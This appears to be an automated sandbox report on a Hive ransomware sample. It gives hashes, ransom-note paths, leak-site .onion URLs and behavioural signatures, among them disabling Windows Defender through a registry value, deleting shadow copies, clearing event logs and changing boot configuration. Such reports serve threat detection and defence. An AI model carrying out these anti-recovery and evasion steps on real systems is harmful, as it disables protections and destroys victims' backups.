Analysis
-
max time kernel
145s -
max time network
126s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
22-11-2021 11:29
Static task
static1
Behavioral task
behavioral1
Sample
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
Resource
win10-en-20211104
General
-
Target
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
-
Size
3.5MB
-
MD5
d63d3afed4c1975a7e31906e0e163305
-
SHA1
b3f4e45ef92c5ec76bfdaeb3a19071db65ddd7c0
-
SHA256
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747
-
SHA512
3c92f0cb5e63620919d7ab412741396fb0f65558a621c4328a69a33ada732f80d03548d3cd88734cd4bc038a7b7c240ecfe61a1f56ead387f04c700fe7d6c1be
Malware Config
Extracted
C:\Program Files\7-Zip\rn9D_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 2056 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1904 bcdedit.exe 1584 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\XOCR3.PSP.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_26BmG3JbEqA0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\js\slideShow.js 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_BOVKX7-WcbA0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14768_.GIF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_OP8BZVtptBs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote-PipelineConfig.xml.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_Db5G7dhuw3U0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mshwLatin.dll.mui 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0335112.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_DbyKg5NeH780.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA6\VBE6EXT.OLB.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_JBcAXPPEXGw0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.OPG.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_7exYpsHexno0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FOLDPROJ.XML.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_oUzm6XFLTQg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\micaut.dll.mui 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_5C5Tj-c8B9c0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_PGpkvClTeZA0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\ICE.ELM.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_MSkCINGlKFs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_L5b4W5g9-Sc0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\TIME.XML.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_iv_ZtvbtPQQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV.HXS.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_-80yO8X8Yr00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00538_.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_l9FRtmbskc00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_right.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_wZh_mHKwnss0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01299_.GIF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_8Wl4-25NsVk0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\rn9D_HOW_TO_DECRYPT.txt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\settings.css 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SUMIPNTG\PREVIEW.GIF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_5ltRwNBXLeM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15021_.GIF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_LQLRWmA-1T40.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Casual.css.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_QZ_Vyvmj7sk0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18224_.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_ae7F_F3QSQ40.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_c_Vsh_9Jsdo0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_AXurjH3vYXQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\info.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_IJg-6OcyaNQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Media Player\ja-JP\wmpnssui.dll.mui 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PIXEL\PIXEL.ELM.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_pW1i-X13VM40.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATHEDITOR_K_COL.HXK.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_Zg2Il8JvqtA0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\library.js 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_Ew1GGZOoIyE0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_u0QbvC_nEt00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_U3gvFTBYZbY0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_dot.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\BLUEPRNT.ELM.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_OKGQJJOSRPs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\js\settings.js 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\mip.exe.mui 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Khartoum.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_g05bjBtMI7w0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mouseout.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\SPLASH.WAV.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_MkDeTlrtSsQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_ln53YLMALrs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_content-background.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_ButtonGraphic.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_n5IOLb7yUiM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_QedOfQZGpjM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187839.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_Tl0y1gzqb9k0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_GxOPATQHYbY0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV_COL.HXT.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_V25hCUBIl4I0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OIS_K_COL.HXK.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_6EYVNf1v_6U0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\TAB_ON.GIF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_zcJOBRH_4gg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_jH580Kh1_FA0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\DVD Maker\rtstreamsource.ax 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_FQEI4DhSE6U0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.config.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD__X-n6k4PzbM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00305_.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_3fHNynZlL8c0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18252_.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_hXbWbf5v7YQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 288 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2088 powershell.exe 2180 powershell.exe 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1640 wevtutil.exe Token: SeBackupPrivilege 1640 wevtutil.exe Token: SeSecurityPrivilege 1080 wevtutil.exe Token: SeBackupPrivilege 1080 wevtutil.exe Token: SeSecurityPrivilege 1976 wevtutil.exe Token: SeBackupPrivilege 1976 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1344 wmic.exe Token: SeSecurityPrivilege 1344 wmic.exe Token: SeTakeOwnershipPrivilege 1344 wmic.exe Token: SeLoadDriverPrivilege 1344 wmic.exe Token: SeSystemProfilePrivilege 1344 wmic.exe Token: SeSystemtimePrivilege 1344 wmic.exe Token: SeProfSingleProcessPrivilege 1344 wmic.exe Token: SeIncBasePriorityPrivilege 1344 wmic.exe Token: SeCreatePagefilePrivilege 1344 wmic.exe Token: SeBackupPrivilege 1344 wmic.exe Token: SeRestorePrivilege 1344 wmic.exe Token: SeShutdownPrivilege 1344 wmic.exe Token: SeDebugPrivilege 1344 wmic.exe Token: SeSystemEnvironmentPrivilege 1344 wmic.exe Token: SeRemoteShutdownPrivilege 1344 wmic.exe Token: SeUndockPrivilege 1344 wmic.exe Token: SeManageVolumePrivilege 1344 wmic.exe Token: 33 1344 wmic.exe Token: 34 1344 wmic.exe Token: 35 1344 wmic.exe Token: SeIncreaseQuotaPrivilege 1624 wmic.exe Token: SeSecurityPrivilege 1624 wmic.exe Token: SeTakeOwnershipPrivilege 1624 wmic.exe Token: SeLoadDriverPrivilege 1624 wmic.exe Token: SeSystemProfilePrivilege 1624 wmic.exe Token: SeSystemtimePrivilege 1624 wmic.exe Token: SeProfSingleProcessPrivilege 1624 wmic.exe Token: SeIncBasePriorityPrivilege 1624 wmic.exe Token: SeCreatePagefilePrivilege 1624 wmic.exe Token: SeBackupPrivilege 1624 wmic.exe Token: SeRestorePrivilege 1624 wmic.exe Token: SeShutdownPrivilege 1624 wmic.exe Token: SeDebugPrivilege 1624 wmic.exe Token: SeSystemEnvironmentPrivilege 1624 wmic.exe Token: SeRemoteShutdownPrivilege 1624 wmic.exe Token: SeUndockPrivilege 1624 wmic.exe Token: SeManageVolumePrivilege 1624 wmic.exe Token: 33 1624 wmic.exe Token: 34 1624 wmic.exe Token: 35 1624 wmic.exe Token: SeIncreaseQuotaPrivilege 1624 wmic.exe Token: SeSecurityPrivilege 1624 wmic.exe Token: SeTakeOwnershipPrivilege 1624 wmic.exe Token: SeLoadDriverPrivilege 1624 wmic.exe Token: SeSystemProfilePrivilege 1624 wmic.exe Token: SeSystemtimePrivilege 1624 wmic.exe Token: SeProfSingleProcessPrivilege 1624 wmic.exe Token: SeIncBasePriorityPrivilege 1624 wmic.exe Token: SeCreatePagefilePrivilege 1624 wmic.exe Token: SeBackupPrivilege 1624 wmic.exe Token: SeRestorePrivilege 1624 wmic.exe Token: SeShutdownPrivilege 1624 wmic.exe Token: SeDebugPrivilege 1624 wmic.exe Token: SeSystemEnvironmentPrivilege 1624 wmic.exe Token: SeRemoteShutdownPrivilege 1624 wmic.exe Token: SeUndockPrivilege 1624 wmic.exe Token: SeManageVolumePrivilege 1624 wmic.exe Token: 33 1624 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1836 wrote to memory of 1536 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 29 PID 1836 wrote to memory of 1536 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 29 PID 1836 wrote to memory of 1536 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 29 PID 1536 wrote to memory of 824 1536 net.exe 31 PID 1536 wrote to memory of 824 1536 net.exe 31 PID 1536 wrote to memory of 824 1536 net.exe 31 PID 1836 wrote to memory of 840 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 32 PID 1836 wrote to memory of 840 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 32 PID 1836 wrote to memory of 840 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 32 PID 840 wrote to memory of 1976 840 net.exe 34 PID 840 wrote to memory of 1976 840 net.exe 34 PID 840 wrote to memory of 1976 840 net.exe 34 PID 1836 wrote to memory of 1896 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 35 PID 1836 wrote to memory of 1896 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 35 PID 1836 wrote to memory of 1896 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 35 PID 1896 wrote to memory of 288 1896 net.exe 37 PID 1896 wrote to memory of 288 1896 net.exe 37 PID 1896 wrote to memory of 288 1896 net.exe 37 PID 1836 wrote to memory of 300 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 38 PID 1836 wrote to memory of 300 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 38 PID 1836 wrote to memory of 300 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 38 PID 300 wrote to memory of 1928 300 net.exe 40 PID 300 wrote to memory of 1928 300 net.exe 40 PID 300 wrote to memory of 1928 300 net.exe 40 PID 1836 wrote to memory of 1072 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 41 PID 1836 wrote to memory of 1072 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 41 PID 1836 wrote to memory of 1072 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 41 PID 1072 wrote to memory of 1572 1072 net.exe 43 PID 1072 wrote to memory of 1572 1072 net.exe 43 PID 1072 wrote to memory of 1572 1072 net.exe 43 PID 1836 wrote to memory of 1328 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 44 PID 1836 wrote to memory of 1328 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 44 PID 1836 wrote to memory of 1328 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 44 PID 1328 wrote to memory of 1644 1328 net.exe 46 PID 1328 wrote to memory of 1644 1328 net.exe 46 PID 1328 wrote to memory of 1644 1328 net.exe 46 PID 1836 wrote to memory of 1656 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 47 PID 1836 wrote to memory of 1656 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 47 PID 1836 wrote to memory of 1656 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 47 PID 1656 wrote to memory of 1704 1656 net.exe 49 PID 1656 wrote to memory of 1704 1656 net.exe 49 PID 1656 wrote to memory of 1704 1656 net.exe 49 PID 1836 wrote to memory of 1668 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 50 PID 1836 wrote to memory of 1668 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 50 PID 1836 wrote to memory of 1668 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 50 PID 1668 wrote to memory of 1696 1668 net.exe 52 PID 1668 wrote to memory of 1696 1668 net.exe 52 PID 1668 wrote to memory of 1696 1668 net.exe 52 PID 1836 wrote to memory of 1432 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 53 PID 1836 wrote to memory of 1432 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 53 PID 1836 wrote to memory of 1432 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 53 PID 1836 wrote to memory of 1768 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 55 PID 1836 wrote to memory of 1768 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 55 PID 1836 wrote to memory of 1768 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 55 PID 1836 wrote to memory of 1968 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 57 PID 1836 wrote to memory of 1968 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 57 PID 1836 wrote to memory of 1968 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 57 PID 1836 wrote to memory of 2020 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 59 PID 1836 wrote to memory of 2020 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 59 PID 1836 wrote to memory of 2020 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 59 PID 1836 wrote to memory of 1176 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 61 PID 1836 wrote to memory of 1176 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 61 PID 1836 wrote to memory of 1176 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 61 PID 1836 wrote to memory of 1576 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 63
Processes
-
C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe"C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe"1⤵
